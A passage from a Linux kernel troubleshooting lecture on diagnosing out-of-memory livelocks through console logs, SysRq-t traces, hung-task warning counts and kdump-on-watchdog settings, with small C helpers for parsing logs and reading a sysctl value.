By configuring a serial console and/or netconsole, you can check memory usage. If free: is below min:, an OOM livelock situation is suspected.
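
The free: versus min: comparison can be automated for a saved console log. The following is a minimal sketch, assuming per-zone lines in the format shown in the example output of this lecture ("Node 0 DMA32 free:0kB min:5200kB ..."); the function names zone_field_kb and zone_below_min are hypothetical.

```c
#include <stdio.h>
#include <string.h>

/*
 * Extract the value of a "<key><number>kB" field from one per-zone line.
 * Returns 0 on success, -1 if the field is missing.
 */
static int zone_field_kb(const char *line, const char *key, unsigned long *kb)
{
        const char *cp = strstr(line, key);

        if (!cp || sscanf(cp + strlen(key), "%lukB", kb) != 1)
                return -1;
        return 0;
}

/*
 * Returns 1 if free: is below min:, 0 if it is not,
 * -1 if the line does not have both fields (i.e. not a per-zone line).
 */
static int zone_below_min(const char *line)
{
        unsigned long free_kb, min_kb;

        /* The leading space avoids matching "free_pcp:" or "free_cma:". */
        if (zone_field_kb(line, " free:", &free_kb) ||
            zone_field_kb(line, " min:", &min_kb))
                return -1;
        return free_kb < min_kb;
}
```

Feeding each line of the log to zone_below_min() and reporting the lines for which it returns 1 is enough for a first check. Note that free: equal to min: is not reported, because the hint above says "below".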

Check threads doing memory allocation using SysRq-t.

By configuring a serial console and/or netconsole, you can check which threads are doing memory allocation. If many threads report a "__alloc_pages_nodemask" line, an OOM livelock situation is suspected.
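
A rough way to apply this hint to a saved console log is to count the backtrace lines that mention the allocator. This is a minimal sketch, assuming the SysRq-t output was captured to a file; the function name count_lines_with is hypothetical. Note that it counts lines, not threads: one backtrace can contain __alloc_pages_nodemask more than once (as in the file_io.00 trace shown earlier), so treat the result as an upper bound.

```c
#include <stdio.h>
#include <string.h>

/*
 * Count the lines of a saved console log which contain the given symbol.
 * Lines longer than the buffer are read in pieces, which is good enough
 * for backtrace lines because they are short.
 */
static unsigned long count_lines_with(FILE *fp, const char *symbol)
{
        char line[1024];
        unsigned long count = 0;

        while (fgets(line, sizeof(line), fp))
                if (strstr(line, symbol))
                        count++;
        return count;
}
```

Call it with a FILE pointer opened on the captured log and "__alloc_pages_nodemask" as the symbol, and compare the results of several SysRq-t captures taken some time apart.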

Watch out for current value of /proc/sys/kernel/hung_task_warnings file.

Since the default value of /proc/sys/kernel/hung_task_warnings is 10, it is common that the value drops to 0 before an actual problem occurs, and then no messages are captured when the actual problem occurs.
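
A periodic check of the remaining count can tell you when it is time to reset the value. The following is a minimal sketch; the function names read_sysctl_long and hung_task_warnings_exhausted are hypothetical, and the path is passed as an argument so that the code can be tried against an ordinary file.

```c
#include <stdio.h>

/*
 * Read a single integer from a sysctl-style file.
 * Returns 0 on success, -1 if the file cannot be read or parsed.
 */
static int read_sysctl_long(const char *path, long *value)
{
        FILE *fp = fopen(path, "r");
        int ok;

        if (!fp)
                return -1;
        ok = fscanf(fp, "%ld", value) == 1;
        fclose(fp);
        return ok ? 0 : -1;
}

/*
 * Returns 1 if the remaining number of hung task warnings is 0,
 * 0 if warnings can still be printed, -1 on error.
 */
static int hung_task_warnings_exhausted(const char *path)
{
        long remaining;

        if (read_sysctl_long(path, &remaining))
                return -1;
        return remaining == 0;
}
```

On a real system, pass "/proc/sys/kernel/hung_task_warnings". When the function returns 1, write a non-zero value back to the file so that messages are printed again.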

In order to capture a kdump, configure the watchdog to trigger a kernel panic rather than a reboot if possible.

Some watchdogs allow configuring the action to take upon timeout. You can increase the possibility of solving problems by taking a kdump before the reboot when your system hangs up.

Try operating procedures before you encounter actual problems.

As I wrote in a serial OSS column, "To invite peaceful night" (written in Japanese), I think that whether you prepared and practiced before encountering problems makes a big difference.